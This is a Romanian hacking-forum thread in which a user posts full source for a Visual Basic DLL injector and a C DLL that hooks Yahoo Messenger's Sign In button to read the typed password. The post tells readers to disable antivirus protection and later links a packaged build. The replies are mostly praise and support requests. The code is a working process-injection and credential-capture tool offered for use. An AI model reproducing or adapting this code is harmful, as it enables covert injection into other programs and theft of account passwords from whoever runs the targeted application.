Retrieve Yahoo! Messenger Password

[vladiii]

Am facut un mic programel care injecteaza un DLL in Yahoo Messenger. Practic, eu interceptez mesajele trimise de windows catre butonul Sign In... Cand primesc un mesaj WM_COMMAND (cu BN_CLICKED) atunci preiau parola din fieldul Password si o afisez intr-un messagebox. Injecterul este facut in VB, iar DLLul in C [asta pt. ca VB sux si nu am reusit sa scriu un DLL care sa execute ceva cand il injectez in procesul YahooMessenger]. Am sa prezint aici codurile sursa. [injecterul in VB este ca orice alt DLL injecter si nu are nimic deosebit... Ideea e ca pe net eu nu am gasit DLL injecter scris in VB, asa ca l-am scris eu (evident, cu ajutor de la injecterele scrise in alte limbaje de programare)]. In acest injecter am lasat si anumite MsgBox'uri care afiseaza valoarea handleurilor. Daca vreun handle este 0, atunci mai dati o data inject (este posibil sa nu injecteze DLL'ul din prima incercare). Pe langa asta e posibil ca AV'ul sa va atentioneze, dar nu-i nicio problema, dezactivati Proactive Defense (la Kasperky...).

Sa vedem codul de la injecter (in modul):

Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function IsWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Const PAGE_READWRITE As Long = &H4
Public Const MEM_COMMIT As Long = &H1000
Public Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Public Const SYNCHRONIZE As Long = &H100000
Public Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Public Const INFINITE As Long = &HFFFFFF

Public Sub injectdll(ByVal procid As Long, ByVal inject As String)
Dim hProcess As Long
Dim lpRemoteAddress As Long
Dim inj As Long
Dim k32 As Long
Dim dwtid As Long
Dim asd As Long

hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, procid)
If (hProcess = 0) Then
   MsgBox "A aparut o eroare!"
End If
asd = GetModuleHandle("kernel32.dll")
k32 = GetProcAddress(asd, "LoadLibraryA")
lpRemoteAddress = VirtualAllocEx(hProcess, 0, Len(inject), MEM_COMMIT, PAGE_READWRITE)
MsgBox lpRemoteAddress
inj = WriteProcessMemory(hProcess, ByVal lpRemoteAddress, ByVal inject, LenB(inject), dwBytesWritten)
MsgBox inj
If (inj <> 0) Then
   hRemoteThread = CreateRemoteThread(hProcess, 0, 0, ByVal k32, ByVal lpRemoteAddress, 0, dwtid)
   MsgBox hRemoteThread
End If
WaitForSingleObject hRemoteThread, INFINITE
CloseHandle hProcess
CloseHandle hRemoteThread
End Sub

Si pe un buton din interiorul formului:

Private Sub Command1_Click()
Dim pid As Long
Dim handle As Long
handle = FindWindow("YahooBuddyMain", vbNullString)
'Gasim PIDul procesului
Call GetWindowThreadProcessId(handle, pid)
'Apelam functia care injecteaza DLLul
Call injectdll(pid, "C:\Project1.dll")
End Sub

Si acum DLL'ul scris in C si compilat in Dev-C++ [evident, este un proiect de tip DLL]. Eu am scris codul in dllmain.c, iar Dev mi-a creat un fisier, dll.h ! Sa vedem codul:

/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI Main();
LRESULT CALLBACK NewWndProc(HWND,UINT,WPARAM,LPARAM);

LONG OldWndProc; // procedura de fereastra YahooMessenger 

BOOL APIENTRY DllMain (HINSTANCE hInst     /* Library instance handle. */ ,
                       DWORD reason        /* Reason this function is being called. */ ,
                       LPVOID reserved     /* Not used. */ )
{
    switch (reason)
    {
      case DLL_PROCESS_ATTACH:
        //Cream un nou thread in care o sa executam codul nostru
        CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&Main,NULL,0,NULL);

      case DLL_PROCESS_DETACH:
        break;

      case DLL_THREAD_ATTACH:
        break;

      case DLL_THREAD_DETACH:
        break;
    }

    /* Returns TRUE on success, FALSE on failure */
    return TRUE;
}

DWORD WINAPI Main()
{
      HWND hand1=FindWindow("YahooBuddyMain", NULL);
      HWND hand2=FindWindowEx(hand1, 0, "#32770", NULL);
      //Butonul Sign In este un copil al ferstrei cu handleul hand2
      OldWndProc=SetWindowLong(hand2,GWL_WNDPROC,(long)NewWndProc); 
      ExitThread(0);
}

LRESULT CALLBACK NewWndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam)
{
  switch(Message)
  {
    case WM_COMMAND:
    {
         //Daca butonul Sign In este "apasat" atunci...
         if(HIWORD(wParam)==BN_CLICKED && LOWORD(wParam)==1) {
             LPARAM pass; 
             long len; 

             HWND hwnd=FindWindow("YahooBuddyMain",0);
             hwnd=FindWindowEx(hwnd, 0, "#32770", NULL);
             HWND hwnd2=FindWindowEx(hwnd, 0, "Edit", NULL); 
             hwnd=FindWindowEx(hwnd, hwnd2, "Edit", NULL);

             len=SendMessage(hwnd, WM_GETTEXTLENGTH,0,0);
             len+=1;
             pass=(LPARAM)malloc(len);
             SendMessage(hwnd, WM_GETTEXT, len, pass);

             //Afisam
             MessageBox (0, (char*)pass, (char*)pass, 0);
                                                             }
    }
  }
// Trimitem mesajele unde trebuiau sa ajunga ele de fapt
  return CallWindowProc((WNDPROC)OldWndProc,hWnd,Message,wParam,lParam); 
}

Cam atat. Sper ca va fi util cuiva/candva !

P.S. Multumiri lui SlicK pt. tot ajutorul acordat [you're the man].

[kw3rln]

bravo !

http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=60

[EsKaBaR]

ehh mi-ar fi de ajutor dll-ul ... ... http://rstcenter.com/forum/am-uitat-parola-la-id-personal-pe-care-sunt-logat-si-acum-t9954.rst

nu stiu ce sa fac sa o recuperez.... nu vreau sa ma despart de id-ul asta ... si sa fac altul ... sunt online ca am lasat remember id and password dar daca mi se strica windows... m-am dus draq ... va rog ajutati-ma si pe mine ... raman dator vladiii ma poti ajuta? ofera-mi si mie support pe mess ca nu ma pricep ..... ... chiar as fi recunoscator...

[vladiii]

^ Am uploadat aici si injecterul si DLLul:

[url]http://rapidshare.com/files/88602000/RetriveY_Pass.rar.html[/url]

Salvezi Project1.dll in C:\, te deloghezi de pe messenger, rulezi injecter.exe apoi dai Sign In si va afisa un msgbox cu parola. Insa, daca parola ta avea mai mult de 8 caractere, in campul acela se va afla: "password". In cazul acesta nu mai ai ce face, deoarece algoritmul de decriptare al parolei nu este cunoscut.

Succes !

[shamat]

Am incercat programul pe un cont cu parola 123456.

Mie imi apar 3 MsgBox-uri. Primul cu un nr de 8 cifre (nu parola mea), al doilea afiseaza nr 1, iar al treilea 92 sau 88.

[vladiii]

Te-ai uitat pe codul sursa ? Se pare ca NU !

1) Acele 3 MsgBoxuri au rolul de a confirma ca DLLul a fost injectat. Daca valorea din vreun MsgBox este 0, atunci DLLul nu a fost injectat si mai trebuie apasat o data pe Inject.

2) MessageBoxul cu parola ta va fi afisat atunci cand dai click pe Sign In. Deoarece eu subclasez acest buton.

[shamat]

Acum am reusit. Programul functioneaza bine.

Ziceai ca daca parola mea are mai mult de 8 caractere in campul parolei se va aflat cuvantul "Password". Chiar daca parola ta e mai scurta de 8 caractere campul acela tot cuvantul "Password" il va contine. Eu cand injectez si dau sign in imi va arata "Password" si nu parola mea. Corecteaza-ma daca am gresit.

[vladiii]

Nu ai gresit. Am testat acum 5 minute si indiferent ce parola ai pune, daca dai Remember ID & Password acolo tot password ramane.

[cristi_c6]

bvo nice program....